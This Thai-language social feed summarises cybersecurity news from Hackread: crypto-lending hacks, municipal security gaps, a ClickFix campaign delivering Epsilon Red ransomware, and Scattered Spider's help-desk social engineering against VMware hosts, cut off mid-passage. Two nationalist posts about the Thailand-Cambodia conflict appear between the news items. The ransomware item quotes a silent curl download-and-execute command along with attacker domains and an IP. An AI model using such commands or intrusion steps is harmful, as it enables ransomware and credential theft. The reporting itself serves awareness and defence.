    Atomic Wallet สูญเงิน $35M จาก vendor ที่เก็บ key ไม่ดี

    การปลอมเว็บกู้เงินและมัลแวร์ clipboard เป็นภัยที่พุ่งเป้าผู้ใช้ทั่วไป
    พบมากใน Telegram, Discord และ browser extensions

    Celsius Network และ Cream Finance เคยถูกแฮกจากการควบคุมภายในที่อ่อนแอ
    เช่นการไม่อัปเดตระบบและการละเลย audit findings

    แนวทางป้องกันที่แนะนำคือ multi-sig wallet, formal verification และ anomaly detection
    Gnosis Safe เป็นเครื่องมือยอดนิยมใน DeFi

    ตลาด crypto lending มีแนวโน้มเติบโตต่อเนื่อง
    คาดว่าจะกลายเป็นเครื่องมือการเงินหลักในอนาคต

    Blockchain ช่วยเพิ่มความโปร่งใสและลดการพึ่งพาตัวกลาง
    แต่ก็ยังต้องพึ่งระบบรักษาความปลอดภัยที่แข็งแรง

    End-to-end encryption และ biometric login เป็นแนวทางเสริมความปลอดภัย
    ช่วยลดความเสี่ยงจาก phishing และ social engineering

    การใช้ระบบ real-time monitoring และ kill switch ช่วยหยุดการโจมตีทันที
    ลดความเสียหายจากการเจาะระบบแบบ flash attack

    https://hackread.com/navigating-cybersecurity-risks-crypto-backed-lending/
    🛡️💸 เรื่องเล่าจากโลกคริปโต: เมื่อการกู้เงินด้วยเหรียญดิจิทัลต้องเผชิญภัยไซเบอร์ ในยุคที่คริปโตไม่ใช่แค่การลงทุน แต่กลายเป็นสินทรัพย์ที่ใช้ค้ำประกันเงินกู้ได้ “Crypto-backed lending” จึงกลายเป็นเทรนด์ที่ทั้งนักลงทุนรายย่อยและสถาบันต่างหันมาใช้กันมากขึ้น เพราะมันเปิดโอกาสให้ผู้ถือเหรียญสามารถกู้เงินโดยไม่ต้องขายเหรียญออกไป แต่ในความสะดวกนั้น ก็มีเงามืดของภัยไซเบอร์ที่ซ่อนอยู่ เพราะเมื่อมีสินทรัพย์ดิจิทัลมูลค่าหลายหมื่นล้านดอลลาร์ถูกล็อกไว้ในแพลตฟอร์มเหล่านี้ แฮกเกอร์ก็ยิ่งพัฒนาเทคนิคใหม่ ๆ เพื่อเจาะระบบให้ได้ ภัยที่พบได้บ่อยคือการเจาะ smart contract ที่มีช่องโหว่ เช่นกรณี Inverse Finance ที่ถูกแฮกผ่านการบิดเบือนข้อมูลจาก oracle จนสูญเงินกว่า 15 ล้านดอลลาร์ หรือกรณี Atomic Wallet ที่สูญเงินกว่า 35 ล้านดอลลาร์เพราะการจัดการ private key ที่หละหลวม นอกจากนี้ยังมีการปลอมเว็บกู้เงินบน Telegram และ Discord เพื่อหลอกให้ผู้ใช้กรอก seed phrase หรือ key รวมถึงมัลแวร์ที่แอบเปลี่ยน address ใน clipboard เพื่อขโมยเหรียญแบบเนียน ๆ บทเรียนจากอดีต เช่นการล่มของ Celsius Network และการถูกเจาะซ้ำของ Cream Finance แสดงให้เห็นว่าไม่ใช่แค่โค้ดที่ต้องแข็งแรง แต่กระบวนการภายในและการตรวจสอบความเสี่ยงก็ต้องเข้มงวดด้วย แนวทางป้องกันที่ดีคือการใช้ multi-signature wallet เช่น Gnosis Safe, การตรวจสอบ smart contract ด้วย formal verification, การตั้งระบบตรวจจับพฤติกรรมผิดปกติแบบ real-time และการให้ผู้ใช้ใช้ hardware wallet ร่วมกับ 2FA เป็นมาตรฐาน ✅ Crypto-backed lending เติบโตอย่างรวดเร็วในปี 2024 ➡️ มีสินทรัพย์กว่า $80B ถูกล็อกใน DeFi lending pools ✅ ผู้ใช้สามารถกู้ stablecoin โดยใช้ BTC หรือ ETH เป็นหลักประกัน ➡️ ไม่ต้องขายเหรียญเพื่อแลกเป็นเงินสด ✅ ช่องโหว่ใน smart contract เป็นจุดเสี่ยงหลัก ➡️ เช่นกรณี Inverse Finance สูญเงิน $15M จาก oracle manipulation ✅ การจัดการ private key ที่ไม่ปลอดภัยนำไปสู่การสูญเงินมหาศาล ➡️ Atomic Wallet สูญเงิน $35M จาก vendor ที่เก็บ key ไม่ดี ✅ การปลอมเว็บกู้เงินและมัลแวร์ clipboard เป็นภัยที่พุ่งเป้าผู้ใช้ทั่วไป ➡️ พบมากใน Telegram, Discord และ browser extensions ✅ Celsius Network และ Cream Finance เคยถูกแฮกจากการควบคุมภายในที่อ่อนแอ ➡️ เช่นการไม่อัปเดตระบบและการละเลย audit findings ✅ แนวทางป้องกันที่แนะนำคือ multi-sig wallet, formal verification และ anomaly detection ➡️ Gnosis Safe เป็นเครื่องมือยอดนิยมใน DeFi ✅ ตลาด crypto lending มีแนวโน้มเติบโตต่อเนื่อง ➡️ คาดว่าจะกลายเป็นเครื่องมือการเงินหลักในอนาคต ✅ Blockchain ช่วยเพิ่มความโปร่งใสและลดการพึ่งพาตัวกลาง ➡️ แต่ก็ยังต้องพึ่งระบบรักษาความปลอดภัยที่แข็งแรง ✅ End-to-end encryption และ biometric login เป็นแนวทางเสริมความปลอดภัย ➡️ ช่วยลดความเสี่ยงจาก phishing และ social engineering ✅ การใช้ระบบ real-time monitoring และ kill switch ช่วยหยุดการโจมตีทันที ➡️ ลดความเสียหายจากการเจาะระบบแบบ flash attack https://hackread.com/navigating-cybersecurity-risks-crypto-backed-lending/
    HACKREAD.COM
    Navigating Cybersecurity Risks in Crypto-Backed Lending
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 346 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: เมืองเล็ก ๆ กับภัยไซเบอร์ที่ใหญ่เกินตัว

    ในยุคที่ทุกอย่างเชื่อมต่อกันผ่านอินเทอร์เน็ต ระบบของเทศบาลและเมืองต่าง ๆ ไม่ได้มีแค่ข้อมูลประชาชน แต่ยังรวมถึงบริการสำคัญ เช่น น้ำ ไฟ การแพทย์ และการรักษาความปลอดภัย ซึ่งหากถูกโจมตี อาจทำให้ทั้งเมืองหยุดชะงักได้ทันที

    ปัญหาคือระบบเหล่านี้มักถูกสร้างขึ้นโดยไม่คำนึงถึงความปลอดภัยตั้งแต่ต้น และยังใช้เทคโนโลยีเก่าที่เสี่ยงต่อการถูกเจาะระบบ แถมงบประมาณด้าน cybersecurity ก็ถูกจัดสรรน้อย เพราะต้องแข่งขันกับความต้องการอื่นที่เร่งด่วนกว่า เช่น การซ่อมถนนหรือการจัดการขยะ

    นอกจากนี้ เจ้าหน้าที่เทศบาลจำนวนมากยังไม่ได้รับการฝึกอบรมด้านความปลอดภัยไซเบอร์อย่างเพียงพอ ทำให้ตกเป็นเหยื่อของ phishing หรือมัลแวร์ได้ง่าย และเมื่อเกิดเหตุการณ์ขึ้น ผลกระทบอาจลุกลามไปถึงความเชื่อมั่นของประชาชนที่มีต่อรัฐบาลท้องถิ่น

    ระบบเทศบาลมีข้อมูลสำคัญและให้บริการพื้นฐาน เช่น น้ำ ไฟ ตำรวจ และดับเพลิง
    หากถูกโจมตี อาจทำให้บริการหยุดชะงักและเกิดความไม่ปลอดภัยในชุมชน
    ข้อมูลประชาชน เช่น หมายเลขประกันสังคมและประวัติสุขภาพ อาจถูกขโมย

    ระบบเหล่านี้มักสร้างขึ้นโดยไม่คำนึงถึงความปลอดภัยตั้งแต่ต้น
    ใช้เทคโนโลยีเก่าที่เสี่ยงต่อการถูกเจาะระบบ
    ขาดการอัปเดตและการตรวจสอบความปลอดภัยอย่างสม่ำเสมอ

    งบประมาณด้าน cybersecurity มักถูกจัดสรรน้อย เพราะมีความต้องการอื่นที่เร่งด่วนกว่า
    การอัปเกรดระบบหรือใช้เครื่องมือรักษาความปลอดภัยขั้นสูงจึงทำได้ยาก
    ส่งผลให้เมืองเล็ก ๆ กลายเป็นเป้าหมายที่ง่ายสำหรับแฮกเกอร์

    เจ้าหน้าที่เทศบาลมักไม่ได้รับการฝึกอบรมด้าน cybersecurity อย่างเพียงพอ
    เสี่ยงต่อการตกเป็นเหยื่อของ phishing หรือ social engineering
    ความผิดพลาดของมนุษย์เป็นจุดอ่อนหลักของระบบความปลอดภัย

    การฝึกอบรมและการร่วมมือกับผู้เชี่ยวชาญภายนอกสามารถช่วยเสริมความปลอดภัยได้
    การจัดอบรมอย่างสม่ำเสมอช่วยให้เจ้าหน้าที่รับมือกับภัยคุกคามใหม่ ๆ
    การร่วมมือกับบริษัท cybersecurity หรือหน่วยงานรัฐช่วยเพิ่มทรัพยากรและความรู้

    นโยบายและกฎระเบียบสามารถสร้างมาตรฐานขั้นต่ำด้านความปลอดภัยให้กับเทศบาล
    เช่น การตรวจสอบระบบเป็นระยะ และการฝึกอบรมพนักงานเป็นข้อบังคับ
    ช่วยให้เกิดความสม่ำเสมอและความร่วมมือระหว่างเมืองต่าง ๆ

    การละเลยด้าน cybersecurity อาจทำให้บริการพื้นฐานของเมืองหยุดชะงักทันทีเมื่อถูกโจมตี
    ส่งผลต่อความปลอดภัยของประชาชน เช่น การตอบสนองฉุกเฉินล่าช้า
    อาจเกิดความเสียหายทางเศรษฐกิจและสังคมในวงกว้าง

    การใช้เทคโนโลยีเก่าโดยไม่มีการอัปเดตเป็นช่องโหว่ที่แฮกเกอร์ใช้เจาะระบบได้ง่าย
    ระบบที่ไม่รองรับการป้องกันภัยใหม่ ๆ จะถูกโจมตีได้โดยไม่ต้องใช้เทคนิคซับซ้อน
    อาจถูกใช้เป็นฐานโจมตีระบบอื่นในเครือข่าย

    การขาดการฝึกอบรมทำให้เจ้าหน้าที่กลายเป็นจุดอ่อนของระบบความปลอดภัย
    การคลิกลิงก์ปลอมหรือเปิดไฟล์แนบอันตรายอาจทำให้ระบบถูกแฮก
    ความผิดพลาดเล็ก ๆ อาจนำไปสู่การละเมิดข้อมูลครั้งใหญ่

    การไม่มีนโยบายหรือมาตรฐานกลางทำให้แต่ละเมืองมีระดับความปลอดภัยไม่เท่ากัน
    เมืองที่ไม่มีทรัพยากรอาจไม่มีการป้องกันเลย
    ส่งผลต่อความมั่นคงของภูมิภาคโดยรวม

    การใช้กรอบการทำงานของ NIST ช่วยให้เทศบาลวางแผนด้าน cybersecurity ได้อย่างเป็นระบบ
    ครอบคลุม 5 ด้าน: Identify, Protect, Detect, Respond, Recover
    มีเครื่องมือและคู่มือให้ใช้ฟรีจากเว็บไซต์ของ NIST

    การทำประกันภัยไซเบอร์ช่วยลดความเสี่ยงทางการเงินเมื่อเกิดเหตุการณ์โจมตี
    คุ้มครองความเสียหายจากการละเมิดข้อมูลและการหยุดชะงักของระบบ
    แต่ต้องศึกษาข้อกำหนดและค่าใช้จ่ายให้รอบคอบ

    การประเมินระบบอย่างสม่ำเสมอช่วยให้รู้จุดอ่อนและปรับปรุงได้ทันเวลา
    ใช้เครื่องมือฟรีจาก CISA เช่น Cyber Resilience Review และ CSET
    ไม่จำเป็นต้องจ้างบริษัทภายนอกที่มีค่าใช้จ่ายสูงเสมอไป

    https://hackread.com/local-government-cybersecurity-municipal-systems-protection/
    🎙️ เรื่องเล่าจากข่าว: เมืองเล็ก ๆ กับภัยไซเบอร์ที่ใหญ่เกินตัว ในยุคที่ทุกอย่างเชื่อมต่อกันผ่านอินเทอร์เน็ต ระบบของเทศบาลและเมืองต่าง ๆ ไม่ได้มีแค่ข้อมูลประชาชน แต่ยังรวมถึงบริการสำคัญ เช่น น้ำ ไฟ การแพทย์ และการรักษาความปลอดภัย ซึ่งหากถูกโจมตี อาจทำให้ทั้งเมืองหยุดชะงักได้ทันที ปัญหาคือระบบเหล่านี้มักถูกสร้างขึ้นโดยไม่คำนึงถึงความปลอดภัยตั้งแต่ต้น และยังใช้เทคโนโลยีเก่าที่เสี่ยงต่อการถูกเจาะระบบ แถมงบประมาณด้าน cybersecurity ก็ถูกจัดสรรน้อย เพราะต้องแข่งขันกับความต้องการอื่นที่เร่งด่วนกว่า เช่น การซ่อมถนนหรือการจัดการขยะ นอกจากนี้ เจ้าหน้าที่เทศบาลจำนวนมากยังไม่ได้รับการฝึกอบรมด้านความปลอดภัยไซเบอร์อย่างเพียงพอ ทำให้ตกเป็นเหยื่อของ phishing หรือมัลแวร์ได้ง่าย และเมื่อเกิดเหตุการณ์ขึ้น ผลกระทบอาจลุกลามไปถึงความเชื่อมั่นของประชาชนที่มีต่อรัฐบาลท้องถิ่น ✅ ระบบเทศบาลมีข้อมูลสำคัญและให้บริการพื้นฐาน เช่น น้ำ ไฟ ตำรวจ และดับเพลิง ➡️ หากถูกโจมตี อาจทำให้บริการหยุดชะงักและเกิดความไม่ปลอดภัยในชุมชน ➡️ ข้อมูลประชาชน เช่น หมายเลขประกันสังคมและประวัติสุขภาพ อาจถูกขโมย ✅ ระบบเหล่านี้มักสร้างขึ้นโดยไม่คำนึงถึงความปลอดภัยตั้งแต่ต้น ➡️ ใช้เทคโนโลยีเก่าที่เสี่ยงต่อการถูกเจาะระบบ ➡️ ขาดการอัปเดตและการตรวจสอบความปลอดภัยอย่างสม่ำเสมอ ✅ งบประมาณด้าน cybersecurity มักถูกจัดสรรน้อย เพราะมีความต้องการอื่นที่เร่งด่วนกว่า ➡️ การอัปเกรดระบบหรือใช้เครื่องมือรักษาความปลอดภัยขั้นสูงจึงทำได้ยาก ➡️ ส่งผลให้เมืองเล็ก ๆ กลายเป็นเป้าหมายที่ง่ายสำหรับแฮกเกอร์ ✅ เจ้าหน้าที่เทศบาลมักไม่ได้รับการฝึกอบรมด้าน cybersecurity อย่างเพียงพอ ➡️ เสี่ยงต่อการตกเป็นเหยื่อของ phishing หรือ social engineering ➡️ ความผิดพลาดของมนุษย์เป็นจุดอ่อนหลักของระบบความปลอดภัย ✅ การฝึกอบรมและการร่วมมือกับผู้เชี่ยวชาญภายนอกสามารถช่วยเสริมความปลอดภัยได้ ➡️ การจัดอบรมอย่างสม่ำเสมอช่วยให้เจ้าหน้าที่รับมือกับภัยคุกคามใหม่ ๆ ➡️ การร่วมมือกับบริษัท cybersecurity หรือหน่วยงานรัฐช่วยเพิ่มทรัพยากรและความรู้ ✅ นโยบายและกฎระเบียบสามารถสร้างมาตรฐานขั้นต่ำด้านความปลอดภัยให้กับเทศบาล ➡️ เช่น การตรวจสอบระบบเป็นระยะ และการฝึกอบรมพนักงานเป็นข้อบังคับ ➡️ ช่วยให้เกิดความสม่ำเสมอและความร่วมมือระหว่างเมืองต่าง ๆ ‼️ การละเลยด้าน cybersecurity อาจทำให้บริการพื้นฐานของเมืองหยุดชะงักทันทีเมื่อถูกโจมตี ⛔ ส่งผลต่อความปลอดภัยของประชาชน เช่น การตอบสนองฉุกเฉินล่าช้า ⛔ อาจเกิดความเสียหายทางเศรษฐกิจและสังคมในวงกว้าง ‼️ การใช้เทคโนโลยีเก่าโดยไม่มีการอัปเดตเป็นช่องโหว่ที่แฮกเกอร์ใช้เจาะระบบได้ง่าย ⛔ ระบบที่ไม่รองรับการป้องกันภัยใหม่ ๆ จะถูกโจมตีได้โดยไม่ต้องใช้เทคนิคซับซ้อน ⛔ อาจถูกใช้เป็นฐานโจมตีระบบอื่นในเครือข่าย ‼️ การขาดการฝึกอบรมทำให้เจ้าหน้าที่กลายเป็นจุดอ่อนของระบบความปลอดภัย ⛔ การคลิกลิงก์ปลอมหรือเปิดไฟล์แนบอันตรายอาจทำให้ระบบถูกแฮก ⛔ ความผิดพลาดเล็ก ๆ อาจนำไปสู่การละเมิดข้อมูลครั้งใหญ่ ‼️ การไม่มีนโยบายหรือมาตรฐานกลางทำให้แต่ละเมืองมีระดับความปลอดภัยไม่เท่ากัน ⛔ เมืองที่ไม่มีทรัพยากรอาจไม่มีการป้องกันเลย ⛔ ส่งผลต่อความมั่นคงของภูมิภาคโดยรวม ✅ การใช้กรอบการทำงานของ NIST ช่วยให้เทศบาลวางแผนด้าน cybersecurity ได้อย่างเป็นระบบ ➡️ ครอบคลุม 5 ด้าน: Identify, Protect, Detect, Respond, Recover ➡️ มีเครื่องมือและคู่มือให้ใช้ฟรีจากเว็บไซต์ของ NIST ✅ การทำประกันภัยไซเบอร์ช่วยลดความเสี่ยงทางการเงินเมื่อเกิดเหตุการณ์โจมตี ➡️ คุ้มครองความเสียหายจากการละเมิดข้อมูลและการหยุดชะงักของระบบ ➡️ แต่ต้องศึกษาข้อกำหนดและค่าใช้จ่ายให้รอบคอบ ✅ การประเมินระบบอย่างสม่ำเสมอช่วยให้รู้จุดอ่อนและปรับปรุงได้ทันเวลา ➡️ ใช้เครื่องมือฟรีจาก CISA เช่น Cyber Resilience Review และ CSET ➡️ ไม่จำเป็นต้องจ้างบริษัทภายนอกที่มีค่าใช้จ่ายสูงเสมอไป https://hackread.com/local-government-cybersecurity-municipal-systems-protection/
    HACKREAD.COM
    Local Government Cybersecurity: Why Municipal Systems Need Extra Protection
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 311 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 233 มุมมอง 0 รีวิว
  • หลวงตาสุจงานงอก พบคลิปโซเชียลไทย แห่ขอบคุณสายลับตาสุจ [31/7/68]
    (Thai social media thanks Thai spy named Ta Such)

    #หลวงตาสุจ #สายลับไทย #ขอบคุณสายลับ #สายลับตาสุจ #ไทยปลื้มตาสุจ #ข่าวดังโซเชียล #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #thaitimes #news1 #shorts #សូមកុំប្រាប់រឿងនេះជូនជនជាតិខ្មែរ។
    หลวงตาสุจงานงอก พบคลิปโซเชียลไทย แห่ขอบคุณสายลับตาสุจ [31/7/68] (Thai social media thanks Thai spy named Ta Such) #หลวงตาสุจ #สายลับไทย #ขอบคุณสายลับ #สายลับตาสุจ #ไทยปลื้มตาสุจ #ข่าวดังโซเชียล #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #thaitimes #news1 #shorts #សូមកុំប្រាប់រឿងនេះជូនជនជាតិខ្មែរ។
    0 ความคิดเห็น 0 การแบ่งปัน 169 มุมมอง 0 0 รีวิว
  • ด่วน! ทหารไทยชวนชาวโซเชียลไทย รวมพลังทำสิ่งนี้! [30/7/68]

    #ด่วนทหารไทยประกาศ #ชวนชาวโซเชียลรวมพลัง #รวมพลังเพื่อชาติ #SocialPowerFromThailand #เสียงจากแนวหน้า #ทหารไทยกับประชาชน #ThaiArmyCallsToAction #ข่าววันนี้ #ข่าวดัง #ข่าวโซเชียล
    #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    ด่วน! ทหารไทยชวนชาวโซเชียลไทย รวมพลังทำสิ่งนี้! [30/7/68] #ด่วนทหารไทยประกาศ #ชวนชาวโซเชียลรวมพลัง #รวมพลังเพื่อชาติ #SocialPowerFromThailand #เสียงจากแนวหน้า #ทหารไทยกับประชาชน #ThaiArmyCallsToAction #ข่าววันนี้ #ข่าวดัง #ข่าวโซเชียล #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    0 ความคิดเห็น 0 การแบ่งปัน 220 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากเงามืด: เมื่อ Scattered Spider ใช้โทรศัพท์แทนมัลแวร์เพื่อยึดระบบเสมือน

    Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงจากการโจมตีองค์กรใหญ่ เช่น MGM Resorts และ Harrods โดยใช้เทคนิคที่ไม่ต้องพึ่งช่องโหว่ซอฟต์แวร์ แต่ใช้ “social engineering” ผ่านการโทรศัพท์ไปยัง Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี Active Directory

    เมื่อได้สิทธิ์เข้าระบบแล้ว พวกเขาจะค้นหาข้อมูลภายใน เช่น รายชื่อผู้ดูแลระบบ vSphere และกลุ่มสิทธิ์ระดับสูง แล้วโทรอีกครั้งเพื่อขอรีเซ็ตรหัสของผู้ดูแลระบบ จากนั้นใช้สิทธิ์ที่ได้เข้าไปยึด VMware vCenter Server Appliance (VCSA) และเปิดช่องทาง SSH บน ESXi hypervisor เพื่อควบคุมระบบทั้งหมด

    พวกเขายังใช้เครื่องมือถูกกฎหมายอย่าง Teleport เพื่อสร้างช่องทางสื่อสารแบบเข้ารหัสที่หลบเลี่ยงไฟร์วอลล์ และทำการโจมตีแบบ “disk-swap” โดยปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุมเอง เพื่อขโมยฐานข้อมูล NTDS.dit ของ Active Directory

